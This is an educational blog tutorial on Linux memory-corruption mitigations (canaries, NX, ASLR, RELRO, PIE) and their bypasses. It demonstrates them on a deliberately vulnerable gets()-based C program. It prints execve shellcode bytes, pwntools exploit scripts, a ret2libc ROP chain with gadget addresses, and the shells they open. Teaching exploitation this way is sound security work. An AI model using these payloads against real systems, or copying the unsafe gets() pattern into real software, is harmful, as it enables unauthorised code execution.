Understanding binary protections (and how to bypass) with a dumb example
Hi! Long time no see, huh? I must apologize for my lousy post schedule. In spite of covid-19 outbreak forcing us to stay home, it appears that I’ve never had less time to spare in my life. Well, let’s get to it.
Memory corruption issues often lead to pretty serious vulnerabilities. It is not uncommon for a stack or heap overflow, use-after-free, double free and others to lead to code execution. A few mitigations try to prevent this class of bugs from causing too much trouble, or at least to make the exploitation harder. Nevertheless, memory corruption is still a thing. Today we’ll talk about these mitigations, how they work, how effective they are and how they are commonly bypassed.
In the beginning…
Back in the day memory corruption was a sure path towards code execution. There were no protections at all and a simple stack overflow was enough to make a flow hijack.
Nowadays when you use GCC to compile a simple C program, the binary will be generated protected as hell. Let’s check it out:
test.c
#include <stdio.h>
#define SIZE 16
void get_buffer(char *strout)
{
printf("Please input a string (max length %d)\n", SIZE);
gets(strout); //oh, shush
}
int main (int argc, char **argv)
{
char buf[SIZE];
get_buffer(buf);
printf("The buffer is:\n%s",buf);
return 0;
}
└────╼ gcc test.c -o test
└────╼ checksec --file=test
RELRO STACK CANARY NX PIE
Full RELRO Canary found NX enabled PIE enabled
It has full RELRO, stack canary, NX and PIE. Not to mention that Linux will, by default, provide ASLR in runtime. (A little lost in these terms? No worries, we’ll get over them in no time)
So let’s rewind to the early days and deactivate all these memory protections. We’ll enable them later and see how they affect exploitation.
└────╼ gcc test.c -o test -fno-stack-protector -z execstack -no-pie -Wl,-z,norelro
└────╼ checksec --file=test
RELRO STACK CANARY NX PIE
No RELRO No canary found NX disabled No PIE
We compile our test file with no protections at all. I’ll also deactivate ASLR protection on my box:
└────╼ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Now we clearly have a stack overflow (or a stack out-of-bounds memory write, if you prefer). This program can be easily transformed into a terminal for code execution. If you have no idea how you can do this, this is a good place start. In that blog post we cracked an OSCP-like stack overflow on Windows. Here we use Linux. The tools are different, but the principles are the same.
Keep in mind that this is a mock test program, which will be used for our examples today. It runs locally, but you can (use your imagination and) picture it as if it was a server input, for example.
We now need to craft a shellcode (a code which will give us shell!) to trigger code execution.
Crafting our payload
First we need a shellcode. There’s no need to reinvent the wheel. Here we see a x64 shellcode we can use (thank you, shell-storm!).
The code of the shellcode may be seen below. Although assembly can be tough to understand at some times, I have added a few comments which might make it easier to grasp:
xor eax, eax ; Zeroes out eax
mov rbx, 0xFF978CD091969DD1 ; this puts "/bin/sh" with a zero by the end. But it is actually negated (so one may put '\0' and not cause the program to think it is the end of the string)
neg rbx ; Negates RBX
push rbx ; pushes RBX to stack
push rsp ; This instruction pushed RSP to the stack
pop rdi ; And this instruction pops it to RDI. The stack points to the string "/bin/sh". Now RDI points to "/bin/sh".
cdq ; Zeroes out RDX
push rdx ; Pushes zero to the stack.
push rdi ; Pushes RDI to stack, which is the pointer to the /bin/sh string.
push rsp ; Pushes RSP and
pop rsi ; pops into RSI. -> rsi = rsp
mov al, 0x3b ; execve syscall number.
syscall ; SYSCALLS!
Basically what it does is call the execve
syscall providing “/bin/sh” as argument.
And if we assemble this right (or just copy from shellstorm), we get the following bytes:
\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05
As this is not a stack overflow tutorial, I won’t dive into too much details regarding the creation of our payload. Instead, I’ll keep it breef. If you feel lost, I strongly recommend you look into the OSCP-like stack overflow exploitation tutorial.
I’ll run the program and attach GDB to it. I’ll also put a breakpoint in the main ret
(or, rather, retq
) instruction.
(gdb) disass main
Dump of assembler code for function main:
0x000000000040052d <+0>: push %rbp
0x000000000040052e <+1>: mov %rsp,%rbp
0x0000000000400531 <+4>: sub $0x20,%rsp
0x0000000000400535 <+8>: mov %edi,-0x14(%rbp)
0x0000000000400538 <+11>: mov %rsi,-0x20(%rbp)
0x000000000040053c <+15>: lea -0x10(%rbp),%rax
0x0000000000400540 <+19>: mov %rax,%rdi
0x0000000000400543 <+22>: callq 0x4004f7 <get_buffer>
0x0000000000400548 <+27>: lea -0x10(%rbp),%rax
0x000000000040054c <+31>: mov %rax,%rsi
0x000000000040054f <+34>: lea 0xc9(%rip),%rdi # 0x40061f
0x0000000000400556 <+41>: mov $0x0,%eax
0x000000000040055b <+46>: callq 0x4003f0 <printf@plt>
0x0000000000400560 <+51>: mov $0x0,%eax
0x0000000000400565 <+56>: leaveq
0x0000000000400566 <+57>: retq
(gdb) b *0x0000000000400566
Breakpoint 3 at 0x400566
Now I’ll send a bunch of “A"s to see if we can trigger anything.
Please input a string (max length 16)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
And our breakpoint hits. Let’s see what’s in the stack.
Thread 1 "test" hit Breakpoint 3, 0x0000000000400566 in main ()
(gdb) x/10x $rsp
0x7fffffffdda8: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffddb8: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffddc8: 0x41414141 0x41414141
So our payload is in the stack right before retq
is called. retq
is just a nickname for pop rip
, which pops the stack to the instruction pointer and redirect the flow to the program. Since we control part of the stack, we can put our shellcode somewhere in there. But how would we trigger it?
Since the stack address will remain the same everytime we run the program, we can put the address for our payload right in 0x7fffffffdda8
. And our shellcode right after (0x7fffffffddb0
). By doing some inspection (printing values in the stack), we find out that the region we control starts at 0x7fffffffdd90
.
How do I know this? Well, I used pattern. But another way is by mere inspection:
(gdb) x/10x $rsp-30
0x7fffffffdd8a: 0x00010040 0x41410000 0x41414141 0x41414141
0x7fffffffdd9a: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffddaa: 0x41414141 0x41414141
(gdb) x/10x $rsp-24
0x7fffffffdd90: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffdda0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffddb0: 0x41414141 0x41414141
(gdb) x/10x $rsp-25
0x7fffffffdd8f: 0x41414100 0x41414141 0x41414141 0x41414141
0x7fffffffdd9f: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffddaf: 0x41414141 0x41414141
By inspection, we see that the stack pointer at the moment retq
is called points to the position 24 of our buffer.
So we need a 24 byte long padding. This is what our payload will look like:
[24 bytes padding] + [address to our shellcode (0x7fffffffddb0)] + [shellcode]
Using python to build our payload and print it, or send it to a file, or call the program directly, we’d have this:
payload = "A"*24 + "\xb0\xdd\xff\xff\xff\x7f\x00\x00\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
I’ll write a python “exploit” for this using pwntools:
from pwn import *
context(arch='amd64', os='linux')
payload = "A"*24 + "\xb0\xdd\xff\xff\xff\x7f\x00\x00\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
io = process("/home/danilo/tmp/test")
io.readline()
io.sendline(payload)
io.interactive()
What this code does is open the target program, read the “Please input a string (max length 16)” line, send our payload and open an interactive channel with the program. The result is a shell:
└────╼ python3 exploit.py
[+] Starting local process '/home/danilo/tmp/test': pid 20836
[*] Switching to interactive mode
The buffer is:
$ ls
exploit.py test test.c
$ pwd
/home/danilo/tmp
$
Great! So upon finding a buffer overflow, it is relatively easy to exploit it into code execution. Or at least it was a couple of decades ago. Now let’s enable the protections and see how it goes.
In the next few sections I’ll present each memory corruption mitigation. They are not in any specific order.
Stack Canary
How cute are canaries?
Well, very cute. According to wikipedia, coal miners used canaries to detect if there was any toxic gases, such as carbon monoxide, in the workplace. Or a snitch: an informant who sings to the police. And they totally mitigate stack overflow vulnerabilities.
The issue with the program we wrote on the previous section was a stack overflow. That means we had a buffer in our stack on which we could write an arbitrary amount of data, even if it surpasses the designated size of the buffer. An adversary may overwrite other data in the memory, such as the return address, and make a flow hijack, leading to arbitrary code execution.
The stack canary is made to detect if the return address was overwritten and make it more difficult to make a flow hijack.
It works very simply, but also very elegantly. An 8 byte long semi-random integer is put before the return address in the stack (see the representation below). Before the function returns, it checks if the canary has been altered. If it hasn’t, the flow continues gracefully. If it has, the program will crash. I said semi-random because not all bytes are random. There are 7 random bytes and a null byte ('\0’). If an adversary has an out of bounds write, he or she will have to overwrite the canary to get to the return address. The null byte was chosen because it is the string terminator. An adversary should have trouble inputting a string with a null byte. In case of a memory leak, the null byte will act as the string terminator before the canary can be printed.
+-----------------------+
| |
| ... |
| |
+-----------------------+
| |
| |
| |
| Vulnerable buffer |
| |
| |
| |
+-----------------------+
| |
| Stack canary |
+-----------------------+
| |
| Return address |
+-----------------------+
| |
| ... |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
+-----------------------+
Let’s recompile our binary, now removing the -fno-stack-protector
option:
gcc test.c -o test -z execstack -no-pie -Wl,-z,norelro
Now disassemble with gdb:
└────╼ gdb ./test
(gdb) disass main
Dump of assembler code for function main:
0x000000000040059d <+0>: push %rbp
0x000000000040059e <+1>: mov %rsp,%rbp
0x00000000004005a1 <+4>: sub $0x30,%rsp
0x00000000004005a5 <+8>: mov %edi,-0x24(%rbp)
0x00000000004005a8 <+11>: mov %rsi,-0x30(%rbp)
0x00000000004005ac <+15>: mov %fs:0x28,%rax
0x00000000004005b5 <+24>: mov %rax,-0x8(%rbp)
0x00000000004005b9 <+28>: xor %eax,%eax
0x00000000004005bb <+30>: lea -0x20(%rbp),%rax
0x00000000004005bf <+34>: mov %rax,%rdi
0x00000000004005c2 <+37>: callq 0x400567 <get_buffer>
0x00000000004005c7 <+42>: lea -0x20(%rbp),%rax
0x00000000004005cb <+46>: mov %rax,%rsi
0x00000000004005ce <+49>: lea 0xda(%rip),%rdi # 0x4006af
0x00000000004005d5 <+56>: mov $0x0,%eax
0x00000000004005da <+61>: callq 0x400460 <printf@plt>
0x00000000004005df <+66>: mov $0x0,%eax
0x00000000004005e4 <+71>: mov -0x8(%rbp),%rdx
0x00000000004005e8 <+75>: xor %fs:0x28,%rdx
0x00000000004005f1 <+84>: je 0x4005f8 <main+91>
0x00000000004005f3 <+86>: callq 0x400450 <__stack_chk_fail@plt>
0x00000000004005f8 <+91>: leaveq
0x00000000004005f9 <+92>: retq
End of assembler dump.
Here we see the assembly code of the main function. Note these lines specifically:
...
0x00000000004005ac <+15>: mov %fs:0x28,%rax
0x00000000004005b5 <+24>: mov %rax,-0x8(%rbp)
...
0x00000000004005e4 <+71>: mov -0x8(%rbp),%rdx
0x00000000004005e8 <+75>: xor %fs:0x28,%rdx
0x00000000004005f1 <+84>: je 0x4005f8 <main+91>
0x00000000004005f3 <+86>: callq 0x400450 <__stack_chk_fail@plt>
0x00000000004005f8 <+91>: leaveq
0x00000000004005f9 <+92>: retq
In <+15> and <+24> it puts the canary in the position %rbp-0x8. Note that the canary will remain the same throughout all functions within the program.
Later on, on lines <+71>, <+75>, it loads the stored canary to %rdx and compares with the original value. If it is equal, (<+84>) meaning the canary hasn’t been altered, it will jump to <+91> leaving the function gracefully. If it is not equal, the __stack_chk_fail
function will be called, causing the program to crash:
└────╼ ./test
Please input a string (max length 16)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
The buffer is:
*** stack smashing detected ***: <unknown> terminated
Aborted (core dumped)
This mitigation kills the vulnerability here. However, note that canary is not a silver bullet (or a silver shield??). It only prevents adversaries from writing beyond the canary. Anything before the canary can be overwritten. It is also only effective on stack out of bounds write. There are many other memory corruption bug classes, such as use-after-free, arbitrary read, arbitrary write, double free, and others. Moreover, there is the possibility of a canary leak, but that would depend on a second vulnerability.
Summarizing, canaries offer a good protection against stack overflow vulnerabilities. A canary leak is a way to bypass this mitigation, but would depend on another vulnerability. The null-byte also mitigates for most part. However, it does not protect from other memory corruption vulnerabilities.
NX
The NX (no-execute) bit is used to mark regions of memory as unexecutable. There’s no reason for the stack or heap to be executed, for instance, since all the code is in the .TEXT
region. With this protection enabled, adversaries need to get more creative to try and bypass the mitigation.
This mitigation also makes our payload useless, since it gets executed in the stack. If we put our payload, we get exit code -11 (SIGSEGV). But is there any bypass?
Ret2libc
Well, yes. It means we can’t add new code to the program, but we can conveniently reuse code that is already in the program.
The return-to-libc technique is based on overwriting return addresses to point to gadgets in libc. Libc is enormous. There are gadgets to do pretty much anything there. For instance, there is the function execve
previously used, which will set stuff up for calling the execve syscall.
But exploiting gets a bit trickier.
First, we deactivate the canary again and activate the NX protection:
gcc test.c -o test -fno-stack-protector -no-pie -Wl,-z,norelro
To craft our new payload, we’ll be using GDB with peda plugin and pwntools with python3.
The goal here is to reuse existing code to get where we want. We need to call the execve syscall. I have started the program and attached gdb to it. I’ll use disass execve
to get the address of the execve libc wrapper:
gdb-peda$ disass execve
Dump of assembler code for function execve:
0x00007ffff7ac6c00 <+0>: mov eax,0x3b
0x00007ffff7ac6c05 <+5>: syscall
0x00007ffff7ac6c07 <+7>: cmp rax,0xfffffffffffff001
0x00007ffff7ac6c0d <+13>: jae 0x7ffff7ac6c10 <execve+16>
0x00007ffff7ac6c0f <+15>: ret
0x00007ffff7ac6c10 <+16>: mov rcx,QWORD PTR [rip+0x306251] # 0x7ffff7dcce68
0x00007ffff7ac6c17 <+23>: neg eax
0x00007ffff7ac6c19 <+25>: mov DWORD PTR fs:[rcx],eax
0x00007ffff7ac6c1c <+28>: or rax,0xffffffffffffffff
0x00007ffff7ac6c20 <+32>: ret
End of assembler dump.
Here we see that the address of execve
function is 0x00007ffff7ac6c00
. We need to pass “/bin/bash” as argument to that syscall, so it opens the terminal (which is our goal here). To do that, we need to set the rdi
register to point to “/bin/bash” string. In addition, rsi
register should be zero. You may be wondering how do I know that. Well, I have checked Linux System Call table.
To correctly set the values for these two registers we need gadgets. Gadgets are parts of existing binary code which we can use to get the desired effect.
We need to set rdi
register to “/bin/bash”. We can put the string in the stack and use a pop rdi;ret
gadget to load the address to rdi
.
Fortunately, libc is gigantic and have enough gadgets so we can do anything we want. And peda will make it very easy to find these gadgets. First let’s see how our payload will be:
padding + pop rdi; ret; + rdi value (pointer to "/bin/bash" string) + pop rsi; ret + rsi value (zero!) + execve addr + "/bin/sh"
It starts with the 24 byte long padding. Then, we’ll set the value of rdi
to point to “/bin/sh” string. Then we’ll zero rsi
out. After that, execve
addr will be put and, finally, the “/bin/sh” string.
To find our gadgets, we’ll use peda:
gdb-peda$ ropsearch "pop rdi; ret" libc
Searching for ROP gadget: 'pop rdi; ret' in: libc ranges
0x00007ffff7a035bf : (b'5fc3') pop rdi; ret
0x00007ffff7a044ae : (b'5fc3') pop rdi; ret
0x00007ffff7a04c37 : (b'5fc3') pop rdi; ret
0x00007ffff7a04cbe : (b'5fc3') pop rdi; ret
0x00007ffff7a05bd2 : (b'5fc3') pop rdi; ret
0x00007ffff7a05f4b : (b'5fc3') pop rdi; ret
0x00007ffff7a072e7 : (b'5fc3') pop rdi; ret
0x00007ffff7a077ce : (b'5fc3') pop rdi; ret
0x00007ffff7a07ce6 : (b'5fc3') pop rdi; ret
0x00007ffff7a08260 : (b'5fc3') pop rdi; ret
0x00007ffff7a088b9 : (b'5fc3') pop rdi; ret
0x00007ffff7a08b81 : (b'5fc3') pop rdi; ret
0x00007ffff7a09647 : (b'5fc3') pop rdi; ret
0x00007ffff7a0a677 : (b'5fc3') pop rdi; ret
0x00007ffff7a0b79c : (b'5fc3') pop rdi; ret
0x00007ffff7a0be84 : (b'5fc3') pop rdi; ret
0x00007ffff7a0ca1f : (b'5fc3') pop rdi; ret
0x00007ffff7a0d0cc : (b'5fc3') pop rdi; ret
0x00007ffff7a0dbcc : (b'5fc3') pop rdi; ret
0x00007ffff7a0e198 : (b'5fc3') pop rdi; ret
0x00007ffff7a0e261 : (b'5fc3') pop rdi; ret
0x00007ffff7a0ef59 : (b'5fc3') pop rdi; ret
0x00007ffff7a0f204 : (b'5fc3') pop rdi; ret
0x00007ffff7a102d3 : (b'5fc3') pop rdi; ret
0x00007ffff7a10307 : (b'5fc3') pop rdi; ret
--More--(25/489)
It has found 489 occurrences of “pop rdi; ret” in libc which we can use. Any one will do. I’ll use 0x00007ffff7a035bf
to craft my payload.
Now the other gadget:
gdb-peda$ ropsearch "pop rsi; ret" libc
Searching for ROP gadget: 'pop rsi; ret' in: libc ranges
0x00007ffff7a05eea : (b'5ec3') pop rsi; ret
0x00007ffff7a12097 : (b'5ec3') pop rsi; ret
0x00007ffff7a229da : (b'5ec3') pop rsi; ret
0x00007ffff7a40854 : (b'5ec3') pop rsi; ret
0x00007ffff7a461b3 : (b'5ec3') pop rsi; ret
0x00007ffff7a4d1c5 : (b'5ec3') pop rsi; ret
0x00007ffff7a5e8a4 : (b'5ec3') pop rsi; ret
0x00007ffff7a60e93 : (b'5ec3') pop rsi; ret
0x00007ffff7a60ecb : (b'5ec3') pop rsi; ret
0x00007ffff7a62ede : (b'5ec3') pop rsi; ret
0x00007ffff7a640d4 : (b'5ec3') pop rsi; ret
0x00007ffff7a641b8 : (b'5ec3') pop rsi; ret
0x00007ffff7a64fc9 : (b'5ec3') pop rsi; ret
0x00007ffff7a66fa6 : (b'5ec3') pop rsi; ret
0x00007ffff7a66ff1 : (b'5ec3') pop rsi; ret
0x00007ffff7a69c62 : (b'5ec3') pop rsi; ret
0x00007ffff7a6a6e0 : (b'5ec3') pop rsi; ret
0x00007ffff7a6aa17 : (b'5ec3') pop rsi; ret
0x00007ffff7a6aac0 : (b'5ec3') pop rsi; ret
0x00007ffff7a6aaf6 : (b'5ec3') pop rsi; ret
0x00007ffff7a6b32f : (b'5ec3') pop rsi; ret
0x00007ffff7a6bd09 : (b'5ec3') pop rsi; ret
0x00007ffff7a6c138 : (b'5ec3') pop rsi; ret
0x00007ffff7a6e5ee : (b'5ec3') pop rsi; ret
0x00007ffff7a6f246 : (b'5ec3') pop rsi; ret
--More--(25/149)
149 occurrences. Again, any one will do. I’ll use 0x00007ffff7a05eea
.
Ok, so we refine our stack payload:
24 byte long padding + 0x00007ffff7a035bf + STACK ADDRESS FOR "/bin/sh" STRING + 0x00007ffff7a05eea + 0 + 0x00007ffff7ac6c00 + "/bin/sh"
All that’s left to do is find out the stack addr for “/bin/sh”. Gdb can do that for us. I’ll prepare the payload without the stack address (will put some garbage instead), send the payload, and see where the string hits. Check the “exploit” out:
from pwn import *
context(arch='amd64', os='linux')
addr_execve = 0x00007ffff7ac6c00 # execve
addr_poprdi_ret = 0x00007ffff7a035bf # pop rdi; ret
addr_poprsi_ret = 0x00007ffff7a05eea # pop rsi; ret
addr_binsh_str = 0xdeadbeefdeadbeef
payload = b"A"*24 + pack(addr_poprdi_ret) + pack(addr_binsh_str) + pack(addr_poprsi_ret) + pack(0) + pack(addr_execve) + b"/bin/bash"
io = process("/home/danilo/tmp/test")
raw_input() # This will stop the program in time so we can attach gdb.
io.readline()
io.sendline(payload)
io.interactive()
We can run it and attach gdb. A breakpoint will be put in the main return instruction.
gdb-peda$ disass main
Dump of assembler code for function main:
0x000000000040052d <+0>: push rbp
0x000000000040052e <+1>: mov rbp,rsp
0x0000000000400531 <+4>: sub rsp,0x20
0x0000000000400535 <+8>: mov DWORD PTR [rbp-0x14],edi
0x0000000000400538 <+11>: mov QWORD PTR [rbp-0x20],rsi
0x000000000040053c <+15>: lea rax,[rbp-0x10]
0x0000000000400540 <+19>: mov rdi,rax
0x0000000000400543 <+22>: call 0x4004f7 <get_buffer>
0x0000000000400548 <+27>: lea rax,[rbp-0x10]
0x000000000040054c <+31>: mov rsi,rax
0x000000000040054f <+34>: lea rdi,[rip+0xc9] # 0x40061f
0x0000000000400556 <+41>: mov eax,0x0
0x000000000040055b <+46>: call 0x4003f0 <printf@plt>
0x0000000000400560 <+51>: mov eax,0x0
0x0000000000400565 <+56>: leave
0x0000000000400566 <+57>: ret
End of assembler dump.
gdb-peda$ br *0x0000000000400566
Breakpoint 1 at 0x400566
gdb-peda$ c
Thread 1 "test" hit Breakpoint 1, 0x0000000000400566 in main ()
gdb-peda$ x/10x $rsp
0x7fffffffdda8: 0x00007ffff7a035bf 0xdeadbeefdeadbeef
0x7fffffffddb8: 0x00007ffff7a05eea 0x0000000000000000
0x7fffffffddc8: 0x00007ffff7ac6c00 0x7361622f6e69622f
0x7fffffffddd8: 0xd1b02fd71f9c0068 0x0000000000400410
0x7fffffffdde8: 0x00007fffffffde80 0x0000000000000000
Looks like we found our target. And it is in address 0x7fffffffddd0
:
gdb-peda$ x/s 0x7fffffffddd0
0x7fffffffddd0: "/bin/bash"
So our final exploit is:
from pwn import *
context(arch='amd64', os='linux')
addr_execve = 0x00007ffff7ac6c00 # execve
addr_poprdi_ret = 0x00007ffff7a035bf # pop rdi; ret
addr_poprsi_ret = 0x00007ffff7a05eea # pop rsi; ret
addr_binsh_str = 0x7fffffffddd0
payload = b"A"*24 + pack(addr_poprdi_ret) + pack(addr_binsh_str) + pack(addr_poprsi_ret) + pack(0) + pack(addr_execve) + b"/bin/bash"
io = process("/home/danilo/tmp/test")
raw_input()
io.readline()
io.sendline(payload)
io.interactive()
And the result:
└────╼ python3 exploit.py
[+] Starting local process '/home/danilo/tmp/test': pid 15432
[*] Switching to interactive mode
The buffer is:
$ whoami
danilo
$
Very nice! We managed to make a flow hijack to get a terminal using libc gadgets.
ASLR
Address Space Layout Randomization, or ASLR for short, would kill the technique used in the previous section. As the name implies, it randomizes the address space layout. This means that each time you run the program, the stack and heap will be in a different addresses. And libc (and all other libs used) will also be in different random addresses.
This kills our previous approach, since we relied on libc gadgets (and now we don’t know where they are) and on knowing the stack address (which will be different on every execution).
Or does it?
Bypassing ASLR?
There are two main ways to bypass ASLR. The first is leaking a libc address. If one single libc function address is leaked, we can calculate the offset and find out where all the gadgets are! However, that would depend on a second vulnerability to leak the address. This is not extremely improbable, but will not happen in our silly example.
The other relies on reusing only the program code. The .TEXT section will not be randomized in ASLR, so we have our entire program to find gadgets. Our silly example is not that long, meaning we won’t find many useful gadgets there.
It’s a shame that we will not demonstrate ASLR bypass in this post. However, I’ll make room for one in the future. (Actually, I have been writting one for a while now and should be out soon.)
RELRO
Before talking about RELRO, first a word or two must be spoken on Procedure Linkage Table (PLT) and Global Offset Table (GOT). In our program we call the libc functions “printf” and “gets”. If ASLR is disabled, these libc functions will always have the same address, as may be seen with the use of ldd
program:
└────╼ ldd test
linux-vdso.so.1 (0x00007ffff7ffa000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff79e2000)
/lib64/ld-linux-x86-64.so.2 (0x00007ffff7dd3000)
└────╼ ldd test
linux-vdso.so.1 (0x00007ffff7ffa000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff79e2000)
/lib64/ld-linux-x86-64.so.2 (0x00007ffff7dd3000)
└────╼ ldd test
linux-vdso.so.1 (0x00007ffff7ffa000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff79e2000)
/lib64/ld-linux-x86-64.so.2 (0x00007ffff7dd3000)
Note that libc addresses remain the same on every execution. However, look what happens when ASLR is enabled:
└────╼ ldd test
linux-vdso.so.1 (0x00007ffe4ed82000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f5016311000)
/lib64/ld-linux-x86-64.so.2 (0x00007f5016702000)
└────╼ ldd test
linux-vdso.so.1 (0x00007ffe621a3000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fc0abf36000)
/lib64/ld-linux-x86-64.so.2 (0x00007fc0ac327000)
└────╼ ldd test
linux-vdso.so.1 (0x00007ffe377ac000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f1ec5854000)
/lib64/ld-linux-x86-64.so.2 (0x00007f1ec5c45000)
The addresses are different everytime! Libc is loaded dinamically in runtime. This makes the program smaller and makes updates on libc easier, as the program does not have to be recompiled upon every libc update. But when printf or gets is called upon, how does it know the address to call?
Well, PLT and GOT are the two answers. When the program calls a function - such as printf - it will not call libc’s function directly. Instead, it will call a wrapper in the PLT:
gdb-peda$ disass main
Dump of assembler code for function main:
...
0x000000000040055b <+46>: call 0x4003f0 <printf@plt>
...
Let’s see what’s up in 0x4003f0 address:
gdb-peda$ disass 0x4003f0
Dump of assembler code for function printf@plt:
0x00000000004003f0 <+0>: jmp QWORD PTR [rip+0x2005aa] # 0x6009a0
0x00000000004003f6 <+6>: push 0x0
0x00000000004003fb <+11>: jmp 0x4003e0
End of assembler dump.
If we disassamble 0x6009a0, we get something in the GOT:
gdb-peda$ disass 0x6009a0
Dump of assembler code for function _GLOBAL_OFFSET_TABLE_:
0x0000000000600988: test al,0x7
0x000000000060098a: (bad)
0x000000000060098b: add BYTE PTR [rax],al
0x000000000060098d: add BYTE PTR [rax],al
0x000000000060098f: add BYTE PTR [rax+0x31],dh
0x0000000000600992: xor al,0x24
0x0000000000600994: in al,0x7f
0x0000000000600996: add BYTE PTR [rax],al
0x0000000000600998: rex clc
0x000000000060099a: adc ah,BYTE PTR [rsp+riz*8]
0x000000000060099d: jg 0x60099f
0x000000000060099f: add BYTE PTR [rax-0x41],dh
0x00000000006009a2: fsub DWORD PTR [rbx]
0x00000000006009a4: in al,0x7f
0x00000000006009a6: add BYTE PTR [rax],al
0x00000000006009a8: nop
0x00000000006009a9: jno 0x600985
0x00000000006009ab: and esp,esp
0x00000000006009ad: jg 0x6009af
0x00000000006009af: add BYTE PTR [rax],al
End of assembler dump.
So what the hell is that?
Since the compiler does not know where to find printf, it makes a wrapper in a memory region just before .TEXT called PLT. This guy is a wrapper to the GOT, another memory region. That’s where things get interesting.
On the first time printf is called on the GOT, it still does not know how to find the libc function. But it will try and find it. When it finds it in libc (a process called dynamic linking), it will redirect to that function’s address. It will also rewrite itself so that in the next time printf is called it already knows where to find it.
A possible attack is to rewrite the PLT or the GOT so it overwrites the pointer to printf function, making it point to somewhere malicious. This can be achieved through an overflow or arbitrary write, for instance.
RELRO, or Relocation Read-Only, is fully enabled, it will prevent from writing in the PLT or GOT, making the forementioned attack impossible. However, it has an overhead to entirely populate the GOT before the main function gets executed.
There’s no bypass to this mitigation that I know of. Except, of course, for using a different approach.
PIE
Position Independent Executables (PIE) provides an extra layer of protection which makes return oriented programming very difficult. We have seen that ASLR will randomize a few parts of the program, but an adversary may still use the .TEXT region for gadgets. PIE randomizes the offset of almost every memory region in the binary. However, this causes a great performance overhead.
To bypass this mitigation, one must have a leaked address to calculate the offset and compensate.
Conclusion
Let’s do a TL;DR here:
Stack canary
A semi-random 8 bytes long integer before the return address so it can’t be overwritten by exploiting a stack buffer overflow.
Pros: very effective against stack buffer overflow. The performance overhead is minimal.
Cons: Does not protect against other memory corruption vulnerabilities.
Bypass: Leak the canary.
NX
Prevents a few regions of the memory (such as the stack and heap) to be executed. With this mitigation, an adversary is unable to put new code into the program and has to do a code-reusage attack.
Pros: makes it impossible to add new code to the program. Prevent dangerous and unnecessary regions to be executed. The performance overhead is minimal.
Cons: does not offer much protection, as ret2libc is a fairly easy bypass.
Bypass: ret2lib, return oriented programming.
ASLR
Randomizes a few regions of the memory, such as stack, heap and libs.
Pros: effective to mitigate ret2libc attacks. It has a reasonable performance overhead, but not an issue.
Cons: does not prevent an adversary to use gadgets within the program.
Bypass: gadgets in the program and address leak.
RELRO
Constructs the GOT before the main function is called and makes it unwritable.
Pros: kills attacks which relies on changing PLT or GOT.
Cons: other attacks are still possible. There’s a performance overhead.
Bypass: none. Perhaps use another approach?
PIE
Randomizes the entire program virtual memory.
Pros: very effective against code-reuse attacks (such as return oriented programming).
Cons: considerable performance overhead.
Bypass: address leak.